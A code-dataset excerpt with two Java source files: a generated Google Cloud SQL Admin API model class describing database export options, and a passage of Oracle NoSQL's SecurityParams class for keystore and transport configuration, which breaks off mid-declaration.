repo_id
stringclasses
875 values
size
int64
974
38.9k
file_path
stringlengths
10
308
content
stringlengths
974
38.9k
googleapis/google-api-java-client-services
35,846
clients/google-api-services-sqladmin/v1beta4/2.0.0/com/google/api/services/sqladmin/model/ExportContext.java
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.sqladmin.model; /** * Database instance export context. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Cloud SQL Admin API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class ExportContext extends com.google.api.client.json.GenericJson { /** * Options for exporting BAK files (SQL Server-only) * The value may be {@code null}. */ @com.google.api.client.util.Key private BakExportOptions bakExportOptions; /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. * The value may be {@code null}. */ @com.google.api.client.util.Key private CsvExportOptions csvExportOptions; /** * Databases to be exported. `MySQL instances:` If `fileType` is `SQL` and no database is * specified, all databases are exported, except for the `mysql` system database. If `fileType` is * `CSV`, you can specify one database, either by using this property or by using the * `csvExportOptions.selectQuery` property, which takes precedence over this property. `PostgreSQL * instances:` If you don't specify a database by name, all user databases in the instance are * exported. This excludes system databases and Cloud SQL databases used to manage internal * operations. Exporting all user databases is only available for directory-formatted parallel * export. If `fileType` is `CSV`, this database must match the one specified in the * `csvExportOptions.selectQuery` property. `SQL Server instances:` You must specify one database * to be exported, and the `fileType` must be `BAK`. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> databases; /** * The file type for the specified uri. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String fileType; /** * This is always `sql#exportContext`. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String kind; /** * Whether to perform a serverless export. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean offload; /** * Options for exporting data as SQL statements. * The value may be {@code null}. */ @com.google.api.client.util.Key private SqlExportOptions sqlExportOptions; /** * Optional. Export parameters specific to SQL Server TDE certificates * The value may be {@code null}. */ @com.google.api.client.util.Key private TdeExportOptions tdeExportOptions; /** * The path to the file in Google Cloud Storage where the export will be stored. The URI is in the * form `gs://bucketName/fileName`. If the file already exists, the request succeeds, but the * operation fails. If `fileType` is `SQL` and the filename ends with .gz, the contents are * compressed. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String uri; /** * Options for exporting BAK files (SQL Server-only) * @return value or {@code null} for none */ public BakExportOptions getBakExportOptions() { return bakExportOptions; } /** * Options for exporting BAK files (SQL Server-only) * @param bakExportOptions bakExportOptions or {@code null} for none */ public ExportContext setBakExportOptions(BakExportOptions bakExportOptions) { this.bakExportOptions = bakExportOptions; return this; } /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. * @return value or {@code null} for none */ public CsvExportOptions getCsvExportOptions() { return csvExportOptions; } /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. * @param csvExportOptions csvExportOptions or {@code null} for none */ public ExportContext setCsvExportOptions(CsvExportOptions csvExportOptions) { this.csvExportOptions = csvExportOptions; return this; } /** * Databases to be exported. `MySQL instances:` If `fileType` is `SQL` and no database is * specified, all databases are exported, except for the `mysql` system database. If `fileType` is * `CSV`, you can specify one database, either by using this property or by using the * `csvExportOptions.selectQuery` property, which takes precedence over this property. `PostgreSQL * instances:` If you don't specify a database by name, all user databases in the instance are * exported. This excludes system databases and Cloud SQL databases used to manage internal * operations. Exporting all user databases is only available for directory-formatted parallel * export. If `fileType` is `CSV`, this database must match the one specified in the * `csvExportOptions.selectQuery` property. `SQL Server instances:` You must specify one database * to be exported, and the `fileType` must be `BAK`. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getDatabases() { return databases; } /** * Databases to be exported. `MySQL instances:` If `fileType` is `SQL` and no database is * specified, all databases are exported, except for the `mysql` system database. If `fileType` is * `CSV`, you can specify one database, either by using this property or by using the * `csvExportOptions.selectQuery` property, which takes precedence over this property. `PostgreSQL * instances:` If you don't specify a database by name, all user databases in the instance are * exported. This excludes system databases and Cloud SQL databases used to manage internal * operations. Exporting all user databases is only available for directory-formatted parallel * export. If `fileType` is `CSV`, this database must match the one specified in the * `csvExportOptions.selectQuery` property. `SQL Server instances:` You must specify one database * to be exported, and the `fileType` must be `BAK`. * @param databases databases or {@code null} for none */ public ExportContext setDatabases(java.util.List<java.lang.String> databases) { this.databases = databases; return this; } /** * The file type for the specified uri. * @return value or {@code null} for none */ public java.lang.String getFileType() { return fileType; } /** * The file type for the specified uri. * @param fileType fileType or {@code null} for none */ public ExportContext setFileType(java.lang.String fileType) { this.fileType = fileType; return this; } /** * This is always `sql#exportContext`. * @return value or {@code null} for none */ public java.lang.String getKind() { return kind; } /** * This is always `sql#exportContext`. * @param kind kind or {@code null} for none */ public ExportContext setKind(java.lang.String kind) { this.kind = kind; return this; } /** * Whether to perform a serverless export. * @return value or {@code null} for none */ public java.lang.Boolean getOffload() { return offload; } /** * Whether to perform a serverless export. * @param offload offload or {@code null} for none */ public ExportContext setOffload(java.lang.Boolean offload) { this.offload = offload; return this; } /** * Options for exporting data as SQL statements. * @return value or {@code null} for none */ public SqlExportOptions getSqlExportOptions() { return sqlExportOptions; } /** * Options for exporting data as SQL statements. * @param sqlExportOptions sqlExportOptions or {@code null} for none */ public ExportContext setSqlExportOptions(SqlExportOptions sqlExportOptions) { this.sqlExportOptions = sqlExportOptions; return this; } /** * Optional. Export parameters specific to SQL Server TDE certificates * @return value or {@code null} for none */ public TdeExportOptions getTdeExportOptions() { return tdeExportOptions; } /** * Optional. Export parameters specific to SQL Server TDE certificates * @param tdeExportOptions tdeExportOptions or {@code null} for none */ public ExportContext setTdeExportOptions(TdeExportOptions tdeExportOptions) { this.tdeExportOptions = tdeExportOptions; return this; } /** * The path to the file in Google Cloud Storage where the export will be stored. The URI is in the * form `gs://bucketName/fileName`. If the file already exists, the request succeeds, but the * operation fails. If `fileType` is `SQL` and the filename ends with .gz, the contents are * compressed. * @return value or {@code null} for none */ public java.lang.String getUri() { return uri; } /** * The path to the file in Google Cloud Storage where the export will be stored. The URI is in the * form `gs://bucketName/fileName`. If the file already exists, the request succeeds, but the * operation fails. If `fileType` is `SQL` and the filename ends with .gz, the contents are * compressed. * @param uri uri or {@code null} for none */ public ExportContext setUri(java.lang.String uri) { this.uri = uri; return this; } @Override public ExportContext set(String fieldName, Object value) { return (ExportContext) super.set(fieldName, value); } @Override public ExportContext clone() { return (ExportContext) super.clone(); } /** * Options for exporting BAK files (SQL Server-only) */ public static final class BakExportOptions extends com.google.api.client.json.GenericJson { /** * Type of this bak file will be export, FULL or DIFF, SQL Server only * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String bakType; /** * Deprecated: copy_only is deprecated. Use differential_base instead * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean copyOnly; /** * Whether or not the backup can be used as a differential base copy_only backup can not be served * as differential base * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean differentialBase; /** * Optional. The end timestamp when transaction log will be included in the export operation. [RFC * 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) in * UTC. When omitted, all available logs until current time will be included. Only applied to * Cloud SQL for SQL Server. * The value may be {@code null}. */ @com.google.api.client.util.Key private String exportLogEndTime; /** * Optional. The begin timestamp when transaction log will be included in the export operation. * [RFC 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) * in UTC. When omitted, all available logs from the beginning of retention period will be * included. Only applied to Cloud SQL for SQL Server. * The value may be {@code null}. */ @com.google.api.client.util.Key private String exportLogStartTime; /** * Option for specifying how many stripes to use for the export. If blank, and the value of the * striped field is true, the number of stripes is automatically chosen. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer stripeCount; /** * Whether or not the export should be striped. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean striped; /** * Type of this bak file will be export, FULL or DIFF, SQL Server only * @return value or {@code null} for none */ public java.lang.String getBakType() { return bakType; } /** * Type of this bak file will be export, FULL or DIFF, SQL Server only * @param bakType bakType or {@code null} for none */ public BakExportOptions setBakType(java.lang.String bakType) { this.bakType = bakType; return this; } /** * Deprecated: copy_only is deprecated. Use differential_base instead * @return value or {@code null} for none */ public java.lang.Boolean getCopyOnly() { return copyOnly; } /** * Deprecated: copy_only is deprecated. Use differential_base instead * @param copyOnly copyOnly or {@code null} for none */ public BakExportOptions setCopyOnly(java.lang.Boolean copyOnly) { this.copyOnly = copyOnly; return this; } /** * Whether or not the backup can be used as a differential base copy_only backup can not be served * as differential base * @return value or {@code null} for none */ public java.lang.Boolean getDifferentialBase() { return differentialBase; } /** * Whether or not the backup can be used as a differential base copy_only backup can not be served * as differential base * @param differentialBase differentialBase or {@code null} for none */ public BakExportOptions setDifferentialBase(java.lang.Boolean differentialBase) { this.differentialBase = differentialBase; return this; } /** * Optional. The end timestamp when transaction log will be included in the export operation. [RFC * 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) in * UTC. When omitted, all available logs until current time will be included. Only applied to * Cloud SQL for SQL Server. * @return value or {@code null} for none */ public String getExportLogEndTime() { return exportLogEndTime; } /** * Optional. The end timestamp when transaction log will be included in the export operation. [RFC * 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) in * UTC. When omitted, all available logs until current time will be included. Only applied to * Cloud SQL for SQL Server. * @param exportLogEndTime exportLogEndTime or {@code null} for none */ public BakExportOptions setExportLogEndTime(String exportLogEndTime) { this.exportLogEndTime = exportLogEndTime; return this; } /** * Optional. The begin timestamp when transaction log will be included in the export operation. * [RFC 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) * in UTC. When omitted, all available logs from the beginning of retention period will be * included. Only applied to Cloud SQL for SQL Server. * @return value or {@code null} for none */ public String getExportLogStartTime() { return exportLogStartTime; } /** * Optional. The begin timestamp when transaction log will be included in the export operation. * [RFC 3339](https://tools.ietf.org/html/rfc3339) format (for example, `2023-10-01T16:19:00.094`) * in UTC. When omitted, all available logs from the beginning of retention period will be * included. Only applied to Cloud SQL for SQL Server. * @param exportLogStartTime exportLogStartTime or {@code null} for none */ public BakExportOptions setExportLogStartTime(String exportLogStartTime) { this.exportLogStartTime = exportLogStartTime; return this; } /** * Option for specifying how many stripes to use for the export. If blank, and the value of the * striped field is true, the number of stripes is automatically chosen. * @return value or {@code null} for none */ public java.lang.Integer getStripeCount() { return stripeCount; } /** * Option for specifying how many stripes to use for the export. If blank, and the value of the * striped field is true, the number of stripes is automatically chosen. * @param stripeCount stripeCount or {@code null} for none */ public BakExportOptions setStripeCount(java.lang.Integer stripeCount) { this.stripeCount = stripeCount; return this; } /** * Whether or not the export should be striped. * @return value or {@code null} for none */ public java.lang.Boolean getStriped() { return striped; } /** * Whether or not the export should be striped. * @param striped striped or {@code null} for none */ public BakExportOptions setStriped(java.lang.Boolean striped) { this.striped = striped; return this; } @Override public BakExportOptions set(String fieldName, Object value) { return (BakExportOptions) super.set(fieldName, value); } @Override public BakExportOptions clone() { return (BakExportOptions) super.clone(); } } /** * Options for exporting data as CSV. `MySQL` and `PostgreSQL` instances only. */ public static final class CsvExportOptions extends com.google.api.client.json.GenericJson { /** * Specifies the character that should appear before a data character that needs to be escaped. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String escapeCharacter; /** * Specifies the character that separates columns within each row (line) of the file. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String fieldsTerminatedBy; /** * This is used to separate lines. If a line does not contain all fields, the rest of the columns * are set to their default values. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String linesTerminatedBy; /** * Specifies the quoting character to be used when a data value is quoted. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String quoteCharacter; /** * The select query used to extract the data. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String selectQuery; /** * Specifies the character that should appear before a data character that needs to be escaped. * @return value or {@code null} for none */ public java.lang.String getEscapeCharacter() { return escapeCharacter; } /** * Specifies the character that should appear before a data character that needs to be escaped. * @param escapeCharacter escapeCharacter or {@code null} for none */ public CsvExportOptions setEscapeCharacter(java.lang.String escapeCharacter) { this.escapeCharacter = escapeCharacter; return this; } /** * Specifies the character that separates columns within each row (line) of the file. * @return value or {@code null} for none */ public java.lang.String getFieldsTerminatedBy() { return fieldsTerminatedBy; } /** * Specifies the character that separates columns within each row (line) of the file. * @param fieldsTerminatedBy fieldsTerminatedBy or {@code null} for none */ public CsvExportOptions setFieldsTerminatedBy(java.lang.String fieldsTerminatedBy) { this.fieldsTerminatedBy = fieldsTerminatedBy; return this; } /** * This is used to separate lines. If a line does not contain all fields, the rest of the columns * are set to their default values. * @return value or {@code null} for none */ public java.lang.String getLinesTerminatedBy() { return linesTerminatedBy; } /** * This is used to separate lines. If a line does not contain all fields, the rest of the columns * are set to their default values. * @param linesTerminatedBy linesTerminatedBy or {@code null} for none */ public CsvExportOptions setLinesTerminatedBy(java.lang.String linesTerminatedBy) { this.linesTerminatedBy = linesTerminatedBy; return this; } /** * Specifies the quoting character to be used when a data value is quoted. * @return value or {@code null} for none */ public java.lang.String getQuoteCharacter() { return quoteCharacter; } /** * Specifies the quoting character to be used when a data value is quoted. * @param quoteCharacter quoteCharacter or {@code null} for none */ public CsvExportOptions setQuoteCharacter(java.lang.String quoteCharacter) { this.quoteCharacter = quoteCharacter; return this; } /** * The select query used to extract the data. * @return value or {@code null} for none */ public java.lang.String getSelectQuery() { return selectQuery; } /** * The select query used to extract the data. * @param selectQuery selectQuery or {@code null} for none */ public CsvExportOptions setSelectQuery(java.lang.String selectQuery) { this.selectQuery = selectQuery; return this; } @Override public CsvExportOptions set(String fieldName, Object value) { return (CsvExportOptions) super.set(fieldName, value); } @Override public CsvExportOptions clone() { return (CsvExportOptions) super.clone(); } } /** * Options for exporting data as SQL statements. */ public static final class SqlExportOptions extends com.google.api.client.json.GenericJson { /** * Options for exporting from MySQL. * The value may be {@code null}. */ @com.google.api.client.util.Key private MysqlExportOptions mysqlExportOptions; /** * Optional. Whether or not the export should be parallel. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean parallel; /** * Options for exporting from a Cloud SQL for PostgreSQL instance. * The value may be {@code null}. */ @com.google.api.client.util.Key private PostgresExportOptions postgresExportOptions; /** * Export only schemas. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean schemaOnly; /** * Tables to export, or that were exported, from the specified database. If you specify tables, * specify one and only one database. For PostgreSQL instances, you can specify only one table. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> tables; /** * Optional. The number of threads to use for parallel export. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer threads; /** * Options for exporting from MySQL. * @return value or {@code null} for none */ public MysqlExportOptions getMysqlExportOptions() { return mysqlExportOptions; } /** * Options for exporting from MySQL. * @param mysqlExportOptions mysqlExportOptions or {@code null} for none */ public SqlExportOptions setMysqlExportOptions(MysqlExportOptions mysqlExportOptions) { this.mysqlExportOptions = mysqlExportOptions; return this; } /** * Optional. Whether or not the export should be parallel. * @return value or {@code null} for none */ public java.lang.Boolean getParallel() { return parallel; } /** * Optional. Whether or not the export should be parallel. * @param parallel parallel or {@code null} for none */ public SqlExportOptions setParallel(java.lang.Boolean parallel) { this.parallel = parallel; return this; } /** * Options for exporting from a Cloud SQL for PostgreSQL instance. * @return value or {@code null} for none */ public PostgresExportOptions getPostgresExportOptions() { return postgresExportOptions; } /** * Options for exporting from a Cloud SQL for PostgreSQL instance. * @param postgresExportOptions postgresExportOptions or {@code null} for none */ public SqlExportOptions setPostgresExportOptions(PostgresExportOptions postgresExportOptions) { this.postgresExportOptions = postgresExportOptions; return this; } /** * Export only schemas. * @return value or {@code null} for none */ public java.lang.Boolean getSchemaOnly() { return schemaOnly; } /** * Export only schemas. * @param schemaOnly schemaOnly or {@code null} for none */ public SqlExportOptions setSchemaOnly(java.lang.Boolean schemaOnly) { this.schemaOnly = schemaOnly; return this; } /** * Tables to export, or that were exported, from the specified database. If you specify tables, * specify one and only one database. For PostgreSQL instances, you can specify only one table. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getTables() { return tables; } /** * Tables to export, or that were exported, from the specified database. If you specify tables, * specify one and only one database. For PostgreSQL instances, you can specify only one table. * @param tables tables or {@code null} for none */ public SqlExportOptions setTables(java.util.List<java.lang.String> tables) { this.tables = tables; return this; } /** * Optional. The number of threads to use for parallel export. * @return value or {@code null} for none */ public java.lang.Integer getThreads() { return threads; } /** * Optional. The number of threads to use for parallel export. * @param threads threads or {@code null} for none */ public SqlExportOptions setThreads(java.lang.Integer threads) { this.threads = threads; return this; } @Override public SqlExportOptions set(String fieldName, Object value) { return (SqlExportOptions) super.set(fieldName, value); } @Override public SqlExportOptions clone() { return (SqlExportOptions) super.clone(); } /** * Options for exporting from MySQL. */ public static final class MysqlExportOptions extends com.google.api.client.json.GenericJson { /** * Option to include SQL statement required to set up replication. If set to `1`, the dump file * includes a CHANGE MASTER TO statement with the binary log coordinates, and --set-gtid-purged is * set to ON. If set to `2`, the CHANGE MASTER TO statement is written as a SQL comment and has no * effect. If set to any value other than `1`, --set-gtid-purged is set to OFF. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer masterData; /** * Option to include SQL statement required to set up replication. If set to `1`, the dump file * includes a CHANGE MASTER TO statement with the binary log coordinates, and --set-gtid-purged is * set to ON. If set to `2`, the CHANGE MASTER TO statement is written as a SQL comment and has no * effect. If set to any value other than `1`, --set-gtid-purged is set to OFF. * @return value or {@code null} for none */ public java.lang.Integer getMasterData() { return masterData; } /** * Option to include SQL statement required to set up replication. If set to `1`, the dump file * includes a CHANGE MASTER TO statement with the binary log coordinates, and --set-gtid-purged is * set to ON. If set to `2`, the CHANGE MASTER TO statement is written as a SQL comment and has no * effect. If set to any value other than `1`, --set-gtid-purged is set to OFF. * @param masterData masterData or {@code null} for none */ public MysqlExportOptions setMasterData(java.lang.Integer masterData) { this.masterData = masterData; return this; } @Override public MysqlExportOptions set(String fieldName, Object value) { return (MysqlExportOptions) super.set(fieldName, value); } @Override public MysqlExportOptions clone() { return (MysqlExportOptions) super.clone(); } } /** * Options for exporting from a Cloud SQL for PostgreSQL instance. */ public static final class PostgresExportOptions extends com.google.api.client.json.GenericJson { /** * Optional. Use this option to include DROP SQL statements. Use these statements to delete * database objects before running the import operation. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean clean; /** * Optional. Option to include an IF EXISTS SQL statement with each DROP statement produced by * clean. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean ifExists; /** * Optional. Use this option to include DROP SQL statements. Use these statements to delete * database objects before running the import operation. * @return value or {@code null} for none */ public java.lang.Boolean getClean() { return clean; } /** * Optional. Use this option to include DROP SQL statements. Use these statements to delete * database objects before running the import operation. * @param clean clean or {@code null} for none */ public PostgresExportOptions setClean(java.lang.Boolean clean) { this.clean = clean; return this; } /** * Optional. Option to include an IF EXISTS SQL statement with each DROP statement produced by * clean. * @return value or {@code null} for none */ public java.lang.Boolean getIfExists() { return ifExists; } /** * Optional. Option to include an IF EXISTS SQL statement with each DROP statement produced by * clean. * @param ifExists ifExists or {@code null} for none */ public PostgresExportOptions setIfExists(java.lang.Boolean ifExists) { this.ifExists = ifExists; return this; } @Override public PostgresExportOptions set(String fieldName, Object value) { return (PostgresExportOptions) super.set(fieldName, value); } @Override public PostgresExportOptions clone() { return (PostgresExportOptions) super.clone(); } } } /** * Optional. Export parameters specific to SQL Server TDE certificates */ public static final class TdeExportOptions extends com.google.api.client.json.GenericJson { /** * Required. Path to the TDE certificate public key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String certificatePath; /** * Required. Certificate name. Applicable only for SQL Server instances. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * Required. Password that encrypts the private key. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String privateKeyPassword; /** * Required. Path to the TDE certificate private key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String privateKeyPath; /** * Required. Path to the TDE certificate public key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @return value or {@code null} for none */ public java.lang.String getCertificatePath() { return certificatePath; } /** * Required. Path to the TDE certificate public key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @param certificatePath certificatePath or {@code null} for none */ public TdeExportOptions setCertificatePath(java.lang.String certificatePath) { this.certificatePath = certificatePath; return this; } /** * Required. Certificate name. Applicable only for SQL Server instances. * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * Required. Certificate name. Applicable only for SQL Server instances. * @param name name or {@code null} for none */ public TdeExportOptions setName(java.lang.String name) { this.name = name; return this; } /** * Required. Password that encrypts the private key. * @return value or {@code null} for none */ public java.lang.String getPrivateKeyPassword() { return privateKeyPassword; } /** * Required. Password that encrypts the private key. * @param privateKeyPassword privateKeyPassword or {@code null} for none */ public TdeExportOptions setPrivateKeyPassword(java.lang.String privateKeyPassword) { this.privateKeyPassword = privateKeyPassword; return this; } /** * Required. Path to the TDE certificate private key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @return value or {@code null} for none */ public java.lang.String getPrivateKeyPath() { return privateKeyPath; } /** * Required. Path to the TDE certificate private key in the form gs://bucketName/fileName. The * instance must have write access to the location. Applicable only for SQL Server instances. * @param privateKeyPath privateKeyPath or {@code null} for none */ public TdeExportOptions setPrivateKeyPath(java.lang.String privateKeyPath) { this.privateKeyPath = privateKeyPath; return this; } @Override public TdeExportOptions set(String fieldName, Object value) { return (TdeExportOptions) super.set(fieldName, value); } @Override public TdeExportOptions clone() { return (TdeExportOptions) super.clone(); } } }
oracle/nosql
35,875
kvmain/src/main/java/oracle/kv/impl/admin/param/SecurityParams.java
/*- * Copyright (C) 2011, 2025 Oracle and/or its affiliates. All rights reserved. * * This file was distributed by Oracle as part of a version of Oracle NoSQL * Database made available at: * * http://www.oracle.com/technetwork/database/database-technologies/nosqldb/downloads/index.html * * Please see the LICENSE file included in the top-level directory of the * appropriate version of Oracle NoSQL Database for a copy of the license and * additional information. */ package oracle.kv.impl.admin.param; import java.io.File; import java.io.Serializable; import java.util.Collection; import java.util.HashMap; import java.util.Map; import java.util.Properties; import java.util.logging.Logger; import javax.net.ssl.KeyManagerFactory; import oracle.kv.KVSecurityConstants; import oracle.kv.impl.param.LoadParameters; import oracle.kv.impl.param.ParameterMap; import oracle.kv.impl.param.ParameterState; import oracle.kv.impl.security.ClearTransport; import oracle.kv.impl.security.ssl.SSLTransport; import oracle.kv.impl.util.registry.ClearSocketPolicy; import oracle.kv.impl.util.registry.ClientSocketFactory; import oracle.kv.impl.util.registry.RMISocketPolicy; /** * The security configuration properties. Although this class is in the * oracle.kv.impl.admin.param package, it isn't actually managed by the admin * at this point. It is managed entirely within the filesystem, using * the securityconfig utility. */ public class SecurityParams { public static final String TRANS_TYPE_FACTORY = "factory"; public static final String TRANS_TYPE_SSL = "ssl"; public static final String TRANS_TYPE_CLEAR = "clear"; /** * The KeyStore type of a keystore or truststore whose type was not * specified explicitly. The JKS value matches the default KeyStore type * prior to Java 9. */ public static final String MISSING_KEYSTORE_TYPE = "JKS"; /* Socket policy used for standard access */ private RMISocketPolicy clientRMISocketPolicy; /* Socket policy used for internally authenticated access */ private RMISocketPolicy trustedRMISocketPolicy; /* The main security parameter map */ private final ParameterMap map; /* Transport-type parameter maps */ private final Map<String, ParameterMap> transportMaps; /* The containing directory of this configuration, if known */ private File configDir; /** * Basic constructor. */ public SecurityParams() { this.map = new ParameterMap(); this.map.setValidate(true); map.setName(ParameterState.SECURITY_PARAMS); map.setType(ParameterState.SECURITY_TYPE); this.transportMaps = new HashMap<String, ParameterMap>(); } /** * constructor with explicit parameter setting. */ public SecurityParams(ParameterMap map) { this.map = map; map.setName(ParameterState.SECURITY_PARAMS); map.setType(ParameterState.SECURITY_TYPE); this.transportMaps = new HashMap<String, ParameterMap>(); this.configDir = null; } /** * constructor for file reading. */ public SecurityParams(LoadParameters lp, File configFile) { this.map = lp.getMapByType(ParameterState.SECURITY_TYPE); map.setName(ParameterState.SECURITY_PARAMS); map.setType(ParameterState.SECURITY_TYPE); this.transportMaps = new HashMap<String, ParameterMap>(); for (ParameterMap pm : lp.getAllMaps(ParameterState.SECURITY_TRANSPORT_TYPE)) { this.transportMaps.put(pm.getName(), pm); } if (configFile != null) { final File absConfigFile = configFile.getAbsoluteFile(); this.configDir = absConfigFile.getParentFile(); } } /** * Creates a minimal security parameters object that is sufficient * to meet the KVStore server requirements, but represents an insecure * environment. */ public static SecurityParams makeDefault() { final SecurityParams sp = new SecurityParams(); sp.setSecurityEnabled(false); sp.addTransportMap("client"); sp.setTransType("client", "clear"); sp.addTransportMap("internal"); sp.setTransType("internal", "clear"); sp.addTransportMap("ha"); sp.setTransType("ha", "clear"); return sp; } /** * Returns an indication of whether this SecurityParams object actually * enables security. */ public boolean isSecure() { return getSecurityEnabled(); } public boolean getSecurityEnabled() { return map.get(ParameterState.SEC_SECURITY_ENABLED).asBoolean(); } /* * Create SSL key manager factory using client-server transportation * settings. The key manager factory is used for creating SSL context for * admin web service. */ public KeyManagerFactory createSSLKeyManagerFactory() throws Exception { if (!isSecure()) { return null; } final String transportName = "client"; final ParameterMap transportParams = findTransportParams(transportName); final SSLTransport transport = (SSLTransport)makeTransportFactory( transportName, transportParams, RMISocketPolicyBuilder.class); return transport.createKeyManagerFactory(this, transportParams); } public void setSecurityEnabled(boolean enabled) { map.setParameter(ParameterState.SEC_SECURITY_ENABLED, Boolean.toString(enabled)); } /** * Set configDir for use when not loaded from file */ public void setConfigDir(File cfgDir) { this.configDir = cfgDir; } /** * Returns the configuration directory containing the security file. * If the SecurityParams is null, the result will be null. */ public File getConfigDir() { return configDir; } /** * Accessor for the underlying parameter map. */ public ParameterMap getMap() { return map; } public Collection<ParameterMap> getTransportMaps() { return transportMaps.values(); } public void addTransportMap(ParameterMap newMap, String name) { newMap.setName(name); newMap.setType(ParameterState.SECURITY_TRANSPORT_TYPE); transportMaps.put(name, newMap); } public void addTransportMap(String name) { ParameterMap transportMap = transportMaps.get(name); if (transportMap == null) { transportMap = new ParameterMap(); transportMap.setValidate(true); transportMap.setName(name); transportMap.setType(ParameterState.SECURITY_TRANSPORT_TYPE); transportMaps.put(name, transportMap); } } public ParameterMap getTransportMap(String name) { return transportMaps.get(name); } /** * Whether SSL is disabled on all transports, including transports client, * ha and internal. * @return true if SSL is disabled on all transports. */ public boolean allTransportSSLDisabled() { return !transportSSLEnabled("client") && !transportSSLEnabled("ha") && !transportSSLEnabled("internal"); } /** * Whether SSL is enabled on given transport. * * @param name transport name, valid names: client, ha and internal. * @return true if SSL is enabled on given transport, otherwise false * if transport isn't enabled SSL or invalid transport is given. */ public boolean transportSSLEnabled(String name) { final String transType = getTransType(name); final String transFactory = getTransFactory(name); return ((transType != null) && transType.equals(TRANS_TYPE_SSL)) || (transFactory != null) && transFactory.equals(SSLTransport.class.getName()); } public File resolveFile(String filename) { if (filename == null) { return null; } final File origFile = new File(filename); if (!origFile.isAbsolute() && configDir != null) { return new File(configDir.getPath(), origFile.getPath()); } return origFile; } public String getKeystoreFile() { return map.get(ParameterState.SEC_KEYSTORE_FILE).asString(); } public void setKeystoreFile(String keystoreFile) { map.setParameter(ParameterState.SEC_KEYSTORE_FILE, keystoreFile); } public String getKeystoreType() { final String type = map.get(ParameterState.SEC_KEYSTORE_TYPE).asString(); /* * Use JKS if no explicit entry is found, since that was the Java * default prior to Java 9. This check is needed so that we use the * proper value when running with Java 9 or later since the default is * now PKCS12. For information on changing the default, see [#26773]. */ return ((type != null) && !"".equals(type)) ? type : MISSING_KEYSTORE_TYPE; } public void setKeystoreType(String keystoreType) { map.setParameter(ParameterState.SEC_KEYSTORE_TYPE, keystoreType); } public String getKeystoreSigPrivateKeyAlias() { final String ksPrivateKeyAlias = map.get(ParameterState.SEC_KEYSTORE_SIG_PRIVATE_KEY_ALIAS). asString(); if (ksPrivateKeyAlias != null && !ksPrivateKeyAlias.isEmpty()) { return ksPrivateKeyAlias; } return null; } public void setKeystoreSigPrivateKeyAlias(String keyAlias) { map.setParameter(ParameterState.SEC_KEYSTORE_SIG_PRIVATE_KEY_ALIAS, keyAlias); } public String getTruststoreFile() { return map.get(ParameterState.SEC_TRUSTSTORE_FILE).asString(); } public void setTruststoreFile(String truststoreFile) { map.setParameter(ParameterState.SEC_TRUSTSTORE_FILE, truststoreFile); } public String getTruststoreType() { final String type = map.get(ParameterState.SEC_TRUSTSTORE_TYPE).asString(); /* As with the KeyStore type, use JKS if no explicit entry is found */ return ((type != null) && !"".equals(type)) ? type : MISSING_KEYSTORE_TYPE; } public void setTruststoreType(String truststoreType) { map.setParameter(ParameterState.SEC_TRUSTSTORE_TYPE, truststoreType); } public String 